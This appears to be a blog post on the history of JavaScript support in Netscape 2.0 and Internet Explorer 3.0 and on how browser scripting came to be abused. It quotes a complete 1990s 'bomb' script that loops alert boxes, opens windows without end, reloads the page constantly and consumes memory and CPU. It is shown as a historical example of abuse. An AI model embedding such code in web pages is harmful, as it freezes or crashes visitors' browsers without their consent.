The Origins of Scripting Web Vulnerabilities in our Browsers
I was thinking of the current situation we are experiencing in Web vulnerabilities specifically with scripting and javascript. So I searched to find the source of when our browsers started to incorporate javascript and found the following:
- Netscape 2.0 was the first version of Netscape to have javascript support – It was released in March 1996 http://wp.netscape.com/eng/mozilla/2.0/relnotes/windows-2.0.html
- “Netscape version 2.0 introduced a bevy of must-have breakthrough features (frames, Java, Javascript and Plug-ins) which helped distance it from the pack…”
http://www.eskimo.com/~bloo/indexdot/history/netscape.htm
The following slides have good background information on the javascript implementation:
http://www.geom.uiuc.edu/~slevy/si/u_pkg_java102/docs/javaone/industry/JavaScri.pdf
On the Internet Explorer side, it was IE 3.0 released August 1996 which incorporated javascript. Just as important, they also included VBScript.
“Version 3 included Internet Mail and News 1.0 and the Windows Address Book. It also brought the browser much closer to the bar that had been set by Netscape, including the support of Netscape’s plugins technology (NPAPI), ActiveX,frames, and a reverse-engineered version of JavaScript named JScript. Later, Microsoft NetMeeting and Windows Media Player were integrated into the product and thus helper applications became not as necessary as they once were. Cascading Style Sheets (CSS) were also introduced with version 3 of Internet Explorer.” – http://en.wikipedia.org/wiki/History_of_Internet_Explorer
It wasn’t long after this time where people found ways to abuse Javascript
[SCRIPT LANGUAGE="JavaScript"]
function AnnoyingButton()
{
while (true)
window.alert("We have taken your Netscape session hostage. Now give us your money, the girl and everything else you got or we're going to break your legs.")
}
// Keep opening windows over and over again
function WindowBomb()
{
var iCounter = 0 // dummy counter
while (true)
{
window.open("http://www.netscape.com","CRASHING" + iCounter,"width=1,height=1,resizable=no")
iCounter++
}
}
// Not as interesting as the other bombs, but this one forces the user to
// stay at the current page. User cannot switch to another page, or click
// stop to stop the reloading.
function ReloadBomb()
{
history.go(0) // reload this page
window.setTimeout('ReloadBomb()',1) // tell netscape to hit this function
// every milisecond =)
}
// Not a very interesting bomb, it does nothing really :>
function WhileLoopLock()
{
while (true){}
}
var szEatMemory = "GOBBLEGOBBLE" // our string to consume our memory
// Now this function EatMemoryInTime is a interesting one that could be
// placed on a timer for maximum nastiness :> I have been able to get
// up to 4Megs consumed by Netscape forcing my machine to crawl =)
// AND it's time driven! No while loops here!
function EatMemoryInTime()
{
szEatMemory = szEatMemory + szEatMemory // keep appending
window.status = "String Length is: " + szEatMemory.length // report size
window.setTimeout('EatMemoryInTime()',1); // tell netscape to hit this function
}
var iNumberOfIterations = 0;
// The Timeout bomb sets up 4 timers which then call itself again, and again
// watch the status bar to see how man times this function gets called.
function TimeBomb()
{
window.status = "TimeBomb has been executed: " + iNumberOfIterations++ + " times";
window.setTimeout('TimeBomb()',1000);
window.setTimeout('TimeBomb()',1000);
window.setTimeout('TimeBomb()',1000);
window.setTimeout('TimeBomb()',1000);
}
[/SCRIPT]
The above is a script from around that time which chews up CPU and memory, forcing you to do a hard reset in Windows 95.
And so over 10 years later, scripting which was designed to enhance our web experience, is still being abused today, but in much different ways that assist in monetary gain for malicious purposes.
Maybe its time we re-architect our browsers and re-think how we should experience the web all over again?
Leave a Reply